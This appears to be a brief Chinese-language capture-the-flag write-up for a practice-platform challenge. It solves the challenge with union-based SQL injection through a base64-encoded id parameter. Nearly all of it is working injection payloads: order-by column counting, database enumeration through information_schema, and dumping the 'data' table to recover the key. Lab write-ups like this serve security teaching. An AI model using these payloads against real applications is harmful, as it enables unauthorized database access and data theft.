打开题目,发现url的id参数有一串base64,MQo=解码,得到1
ok,看来提交的参数都是需要经过base64转码的才行
根据题目,直接开始猜字段
id=1 order by 2正确,order by 3错误,判断有两个字段
使用联合注入
id=-1 union select 1,2
在1,2位置都有回显,id=-1 union select database(),2 判断数据库名字得到为test
id=-1 union select group_concat(table_name),2 from information_schema.tables where table_schema='test'
得到一张表 data
id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name='data'
得到所有列
id,title,main,thekey
这里应该是有我们所需要的东西的
id=-1 union select group_concat(id,title,main,thekey),2 from data
得到墨者的key